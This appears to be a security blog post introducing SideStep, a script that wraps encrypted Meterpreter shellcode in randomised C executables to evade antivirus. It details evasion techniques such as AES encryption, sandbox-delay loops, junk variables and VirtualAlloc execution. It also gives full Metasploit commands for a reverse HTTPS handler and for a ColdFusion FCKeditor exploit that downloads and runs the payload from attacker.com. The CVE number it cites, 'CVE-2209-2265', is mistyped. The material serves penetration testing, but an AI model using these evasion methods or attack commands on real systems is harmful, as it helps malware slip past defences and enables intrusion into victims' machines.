CodeWatch

SideStep: Another AV Evasion Tool

A few years ago I was working on a basic penetration test and came across a remote code execution vulnerability. I tried using Metasploit to deliver a payload but it became evident that the host’s antivirus software was removing the executable. See this article as a reference. This was shortly after the initial release of Veil and I was unfamiliar with that tool at the time. I wanted to use Metasploit to control the host and perform various actions so I began researching how to modify the payload and deliver it in a way that would bypass the AV solution.

Before I get too far, if you need to bypass AV, start by using Veil. If/when Veil fails, try other methods and tools, like what I am providing here.

When researching bypass solutions there was Hyperion, which is discussed by one of the Veil developer’s here, and another trick I found of creating a bunch of string variables with long string values found here, along with other tricks here and there. The customer’s AV caught all of these attempts. I needed to build my own payload and thus decided to try using the CryptoPP library to encrypt a Metasploit payload, shove that into a C program, and decrypt it just before execution. This actually worked and I used it a few times before Veil became better known (I’ve been using Veil ever since I became aware of the project).

I’ve wanted to automate the process of creating this same type of executable for a while but put it off until recently. I finally got around to developing and releasing SideStep. SideStep is a python script that automatically generates and compiles C code that uses encrypted Metasploit payloads.

Some of the features of SideStep used to evade AV software includes:

  1. Encrypts the msfvenom generated Meterpreter shellcode using AES 128bit encryption (using the CryptoPP C++ library) with a randomly generated key. The payload is decrypted just prior to execution.
  2. Randomizes all variable names and functions. The size of the names and functions is configurable.
  3. Creates a function that checks the local time on the host, then loops for a configurable amount of seconds at the beginning of the program, to evade AV sandboxes. There is also the addition of a DH parameter generator which adds extra time to the startup.
  4. Stuffs the executable with a configurable number of random variables that have random values of a configurable size. These variables are prior to the call to main(). This is a technique that is occasionally effective and that I picked up from the NCC Group Metasploit Evasion link above.
  5. If Cygwin is present, it uses strip to remove debugging symbols and other useful reversing information.
  6. If you want to use peCloak, it will then encode the assembly instructions in the executable as the last step.

The code also uses VirtualAlloc to allocate memory, copy the shellcode to this allocated memory space, and then execute it to bypass DEP. The technique can be found here.

This is pretty ugly code that I wanted to just get working first. I plan to rewrite the modules in more of an OOP style and add additional features for evasion. It might be beneficial to add support for alternative algorithms and key strengths. I also intend to add support for randomizing where functions are placed within the C code.

The following software is required:

  • Metasploit Community 4.11.1 – Update 2015031001 (or later – this is what I tested with and some recent previous versions screwed up the shellcode when using the alpha encoder)
  • Ruby 2.x
  • Windows (7 or 8 should work – tested on 8.1)
  • Python 2.7.x
  • Visual Studio (free editions should be fine – tested on 2012)
  • Windows SDK
  • Cygwin with strip utility (if you want to strip debug symbols)
  • peCloak (if you want to use it)

I have included the CryptoPP source and a 32bit compiled version of the library, which I believe is ok as I have included the CryptoPP license with this repository. Visual Studio and Windows are required at the moment because I couldn’t get it to compile with ming-gcc (I would love any insight into how to get that to work). You will also need Python, Ruby, and the cl.exe tool from Visual Studio in your PATH at a minimum.

You must configure settings in conf\settings.py, and then you must at a minimum provide the Metasploit listening handler IP and port:

  python sidestep.py --ip 192.168.1.1 --port 443

 
If using the defaults, then a source file will be generated in the .\source directory and the executable will be dropped in the .\exe directory.

Setup a Meterpreter handler on your attacking machine like so (modifying the PAYLOAD, LHOST, and LPORT as needed):

  use multi/handler
  set PAYLOAD windows/meterpreter/reverse_https
  set LHOST 192.168.1.1
  set LPORT 443
  set AutoRunScript post/windows/manage/smart_migrate
  run

 
The best way to deliver the executable via Metasploit is to load up your exploit, and then set the PAYLOAD to windows/download_exec, and upload the executable to a web server. Sample configuration:

  use exploit/windows/http/coldfusion_fckeditor
  set PAYLOAD windows/download_exec
  set EXE sidestep.exe
  set URL http://www.attacker.com:80/sidestep.exe
  set AutoRunScript post/windows/manage/smart_migrate
  set RHOST 1.1.1.1
  set RPORT 80
  run

 
This would exploit the FCKeditor vulnerability in ColdFusion (CVE-2209-2265), running shellcode that downloads an executable from the provided URL, saves it as the provided EXE name, and then executes it.

You can get the source code to SideStep here.

Happy Hacking!

Josh Berry

, , ,
, , , , , , , , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

Blog at WordPress.com.

%d bloggers like this: